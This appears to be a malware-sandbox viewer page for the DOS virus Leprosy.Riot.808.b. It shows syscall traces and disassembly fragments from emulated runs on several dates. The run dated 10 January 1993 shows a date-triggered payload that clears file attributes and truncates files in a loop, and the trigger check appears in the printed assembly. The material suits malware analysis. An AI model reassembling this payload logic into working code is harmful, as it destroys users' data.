Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Riot.808.b

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:53:42.814734547Z	48	PC: 12b35 \| Get DOS version
2018-12-17T22:53:42.815899115Z	44	PC: 12b3d \| Get time 0x12b3d: mov byte ptr [0x102], dl 0x12b41: mov dx, 0x145 0x12b44: mov ah, 0x1a 0x12b46: int 0x21 0x12b48: mov ah, 0x19 0x12b4a: int 0x21 0x12b4c: mov dl, al 0x12b4e: inc dl 0x12b50: mov ah, 0x47 0x12b52: mov si, 0x1a4 0x12b55: int 0x21 0x12b57: mov dx, 0x143 0x12b5a: mov ah, 0x3b 0x12b5c: int 0x21 0x12b5e: mov cx, 0x13 0x12b61: mov dx, 0x137 0x12b64: mov ah, 0x4e 0x12b66: int 0x21 0x12b68: cmp ax, 0x12 0x12b6b: jne 0x12b6f
2018-12-17T22:53:42.819222968Z	26	PC: 12b48 \| Set disk transfer address
2018-12-17T22:53:42.820433282Z	25	PC: 12b4c \| Get default drive
2018-12-17T22:53:42.821650478Z	71	PC: 12b57 \| Get current directory
2018-12-17T22:53:42.82559105Z	59	PC: 12b5e \| Change current directory
2018-12-17T22:53:42.830614487Z	78	PC: 12b68 \| Find first file
2018-12-17T22:53:42.837112002Z	87	PC: 12c4a \| Get or set file date and time
2018-12-17T22:53:42.839837762Z	67	PC: 12c56 \| Get or set file attributes
2018-12-17T22:53:42.841892952Z	59	PC: 12c5d \| Change current directory
2018-12-17T22:53:42.846193531Z	59	PC: 12c64 \| Change current directory
2018-12-17T22:53:42.855244001Z	42	PC: 12c68 \| Get date 0x12c68: cmp cx, 0x7c9 0x12c6c: jb 0x12c9a 0x12c6e: cmp dl, 0xa 0x12c71: jne 0x12c9a 0x12c73: mov dx, 0x145 0x12c76: mov ah, 0x1a 0x12c78: int 0x21 0x12c7a: mov ah, 0x4e 0x12c7c: mov cx, 7 0x12c7f: mov dx, 0x13f 0x12c82: int 0x21 0x12c84: jb 0x12c9a 0x12c86: mov ax, 0x4301 0x12c89: xor cx, cx 0x12c8b: int 0x21 0x12c8d: mov dx, 0x163 0x12c90: mov ah, 0x3c 0x12c92: int 0x21 0x12c94: jb 0x12c9a 0x12c96: mov ah, 0x4f
2018-12-17T22:53:42.85853905Z	76	PC: 12c9f \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11317,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:30:19.073825139Z	48	PC: 12b35 \| Get DOS version
2018-12-25T12:30:19.076683019Z	44	PC: 12b3d \| Get time 0x12b3d: mov byte ptr [0x102], dl 0x12b41: mov dx, 0x145 0x12b44: mov ah, 0x1a 0x12b46: int 0x21 0x12b48: mov ah, 0x19 0x12b4a: int 0x21 0x12b4c: mov dl, al 0x12b4e: inc dl 0x12b50: mov ah, 0x47 0x12b52: mov si, 0x1a4 0x12b55: int 0x21 0x12b57: mov dx, 0x143 0x12b5a: mov ah, 0x3b 0x12b5c: int 0x21 0x12b5e: mov cx, 0x13 0x12b61: mov dx, 0x137 0x12b64: mov ah, 0x4e 0x12b66: int 0x21 0x12b68: cmp ax, 0x12 0x12b6b: jne 0x12b6f
2018-12-25T12:30:19.078883512Z	26	PC: 12b48 \| Set disk transfer address
2018-12-25T12:30:19.080317686Z	25	PC: 12b4c \| Get default drive
2018-12-25T12:30:19.082035774Z	71	PC: 12b57 \| Get current directory
2018-12-25T12:30:19.085368595Z	59	PC: 12b5e \| Change current directory
2018-12-25T12:30:19.089650895Z	78	PC: 12b68 \| Find first file
2018-12-25T12:30:19.095592723Z	87	PC: 12c4a \| Get or set file date and time
2018-12-25T12:30:19.099911907Z	67	PC: 12c56 \| Get or set file attributes
2018-12-25T12:30:19.10173459Z	59	PC: 12c5d \| Change current directory
2018-12-25T12:30:19.105686893Z	59	PC: 12c64 \| Change current directory
2018-12-25T12:30:19.108968924Z	42	PC: 12c68 \| Get date 0x12c68: cmp cx, 0x7c9 0x12c6c: jb 0x12c9a 0x12c6e: cmp dl, 0xa 0x12c71: jne 0x12c9a 0x12c73: mov dx, 0x145 0x12c76: mov ah, 0x1a 0x12c78: int 0x21 0x12c7a: mov ah, 0x4e 0x12c7c: mov cx, 7 0x12c7f: mov dx, 0x13f 0x12c82: int 0x21 0x12c84: jb 0x12c9a 0x12c86: mov ax, 0x4301 0x12c89: xor cx, cx 0x12c8b: int 0x21 0x12c8d: mov dx, 0x163 0x12c90: mov ah, 0x3c 0x12c92: int 0x21 0x12c94: jb 0x12c9a 0x12c96: mov ah, 0x4f
2018-12-25T12:30:19.111199221Z	76	PC: 12c9f \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11317,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:30:19.283219544Z	48	PC: 12b35 \| Get DOS version
2018-12-25T12:30:19.285207639Z	44	PC: 12b3d \| Get time 0x12b3d: mov byte ptr [0x102], dl 0x12b41: mov dx, 0x145 0x12b44: mov ah, 0x1a 0x12b46: int 0x21 0x12b48: mov ah, 0x19 0x12b4a: int 0x21 0x12b4c: mov dl, al 0x12b4e: inc dl 0x12b50: mov ah, 0x47 0x12b52: mov si, 0x1a4 0x12b55: int 0x21 0x12b57: mov dx, 0x143 0x12b5a: mov ah, 0x3b 0x12b5c: int 0x21 0x12b5e: mov cx, 0x13 0x12b61: mov dx, 0x137 0x12b64: mov ah, 0x4e 0x12b66: int 0x21 0x12b68: cmp ax, 0x12 0x12b6b: jne 0x12b6f
2018-12-25T12:30:19.300601279Z	26	PC: 12b48 \| Set disk transfer address
2018-12-25T12:30:19.302256945Z	25	PC: 12b4c \| Get default drive
2018-12-25T12:30:19.303866732Z	71	PC: 12b57 \| Get current directory
2018-12-25T12:30:19.308000636Z	59	PC: 12b5e \| Change current directory
2018-12-25T12:30:19.313433814Z	78	PC: 12b68 \| Find first file
2018-12-25T12:30:19.320573719Z	87	PC: 12c4a \| Get or set file date and time
2018-12-25T12:30:19.324371339Z	67	PC: 12c56 \| Get or set file attributes
2018-12-25T12:30:19.337992233Z	59	PC: 12c5d \| Change current directory
2018-12-25T12:30:19.344463745Z	59	PC: 12c64 \| Change current directory
2018-12-25T12:30:19.347313108Z	42	PC: 12c68 \| Get date 0x12c68: cmp cx, 0x7c9 0x12c6c: jb 0x12c9a 0x12c6e: cmp dl, 0xa 0x12c71: jne 0x12c9a 0x12c73: mov dx, 0x145 0x12c76: mov ah, 0x1a 0x12c78: int 0x21 0x12c7a: mov ah, 0x4e 0x12c7c: mov cx, 7 0x12c7f: mov dx, 0x13f 0x12c82: int 0x21 0x12c84: jb 0x12c9a 0x12c86: mov ax, 0x4301 0x12c89: xor cx, cx 0x12c8b: int 0x21 0x12c8d: mov dx, 0x163 0x12c90: mov ah, 0x3c 0x12c92: int 0x21 0x12c94: jb 0x12c9a 0x12c96: mov ah, 0x4f
2018-12-25T12:30:19.351075149Z	76	PC: 12c9f \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":10,"Month":1,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11317,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:30:19.374634964Z	48	PC: 12b35 \| Get DOS version
2018-12-25T12:30:19.376856924Z	44	PC: 12b3d \| Get time 0x12b3d: mov byte ptr [0x102], dl 0x12b41: mov dx, 0x145 0x12b44: mov ah, 0x1a 0x12b46: int 0x21 0x12b48: mov ah, 0x19 0x12b4a: int 0x21 0x12b4c: mov dl, al 0x12b4e: inc dl 0x12b50: mov ah, 0x47 0x12b52: mov si, 0x1a4 0x12b55: int 0x21 0x12b57: mov dx, 0x143 0x12b5a: mov ah, 0x3b 0x12b5c: int 0x21 0x12b5e: mov cx, 0x13 0x12b61: mov dx, 0x137 0x12b64: mov ah, 0x4e 0x12b66: int 0x21 0x12b68: cmp ax, 0x12 0x12b6b: jne 0x12b6f
2018-12-25T12:30:19.379316329Z	26	PC: 12b48 \| Set disk transfer address
2018-12-25T12:30:19.380552362Z	25	PC: 12b4c \| Get default drive
2018-12-25T12:30:19.381962022Z	71	PC: 12b57 \| Get current directory
2018-12-25T12:30:19.385594131Z	59	PC: 12b5e \| Change current directory
2018-12-25T12:30:19.390019159Z	78	PC: 12b68 \| Find first file
2018-12-25T12:30:19.400979463Z	87	PC: 12c4a \| Get or set file date and time
2018-12-25T12:30:19.403275368Z	67	PC: 12c56 \| Get or set file attributes
2018-12-25T12:30:19.405127234Z	59	PC: 12c5d \| Change current directory
2018-12-25T12:30:19.409657929Z	59	PC: 12c64 \| Change current directory
2018-12-25T12:30:19.412808957Z	42	PC: 12c68 \| Get date 0x12c68: cmp cx, 0x7c9 0x12c6c: jb 0x12c9a 0x12c6e: cmp dl, 0xa 0x12c71: jne 0x12c9a 0x12c73: mov dx, 0x145 0x12c76: mov ah, 0x1a 0x12c78: int 0x21 0x12c7a: mov ah, 0x4e 0x12c7c: mov cx, 7 0x12c7f: mov dx, 0x13f 0x12c82: int 0x21 0x12c84: jb 0x12c9a 0x12c86: mov ax, 0x4301 0x12c89: xor cx, cx 0x12c8b: int 0x21 0x12c8d: mov dx, 0x163 0x12c90: mov ah, 0x3c 0x12c92: int 0x21 0x12c94: jb 0x12c9a 0x12c96: mov ah, 0x4f
2018-12-25T12:30:19.415094726Z	26	PC: 12c7a \| Set disk transfer address
2018-12-25T12:30:19.416318505Z	78	PC: 12c84 \| Find first file
2018-12-25T12:30:19.42334946Z	67	PC: 12c8d \| Get or set file attributes
2018-12-25T12:30:19.428196703Z	60	PC: 12c94 \| Create or truncate file
2018-12-25T12:30:19.447173899Z	79	PC: 12c84 \| Find next file (See above)
2018-12-25T12:30:19.459184441Z	67	PC: 12c8d \| Get or set file attributes (See above)
2018-12-25T12:30:19.472376385Z	60	PC: 12c94 \| Create or truncate file (See above)
2018-12-25T12:30:19.488036576Z	79	PC: 12c84 \| Find next file (See above)
2018-12-25T12:30:19.49206588Z	67	PC: 12c8d \| Get or set file attributes (See above)
2018-12-25T12:30:19.501961349Z	60	PC: 12c94 \| Create or truncate file (See above)
2018-12-25T12:30:19.514678579Z	79	PC: 12c84 \| Find next file (See above)
2018-12-25T12:30:19.517586607Z	67	PC: 12c8d \| Get or set file attributes (See above)
2018-12-25T12:30:19.527989734Z	60	PC: 12c94 \| Create or truncate file (See above)
2018-12-25T12:30:19.54063113Z	79	PC: 12c84 \| Find next file (See above)
2018-12-25T12:30:19.543526263Z	67	PC: 12c8d \| Get or set file attributes (See above)
2018-12-25T12:30:19.554412387Z	60	PC: 12c94 \| Create or truncate file (See above)
2018-12-25T12:30:19.563296409Z	79	PC: 12c84 \| Find next file (See above)
2018-12-25T12:30:19.565870965Z	67	PC: 12c8d \| Get or set file attributes (See above)
2018-12-25T12:30:19.57611438Z	60	PC: 12c94 \| Create or truncate file (See above)
2018-12-25T12:30:19.588445102Z	79	PC: 12c84 \| Find next file (See above)
2018-12-25T12:30:19.591919574Z	67	PC: 12c8d \| Get or set file attributes (See above)
2018-12-25T12:30:19.605645208Z	60	PC: 12c94 \| Create or truncate file (See above)
2018-12-25T12:30:19.618837099Z	79	PC: 12c84 \| Find next file (See above)
2018-12-25T12:30:19.621433471Z	67	PC: 12c8d \| Get or set file attributes (See above)
2018-12-25T12:30:19.633070837Z	60	PC: 12c94 \| Create or truncate file (See above)
2018-12-25T12:30:19.645268693Z	79	PC: 12c84 \| Find next file (See above)
2018-12-25T12:30:19.647973889Z	67	PC: 12c8d \| Get or set file attributes (See above)
2018-12-25T12:30:19.658389354Z	60	PC: 12c94 \| Create or truncate file (See above)
2018-12-25T12:30:19.672926934Z	79	PC: 12c84 \| Find next file (See above)
2018-12-25T12:30:19.675506117Z	76	PC: 12c9f \| Terminate with return code (Return code = '0')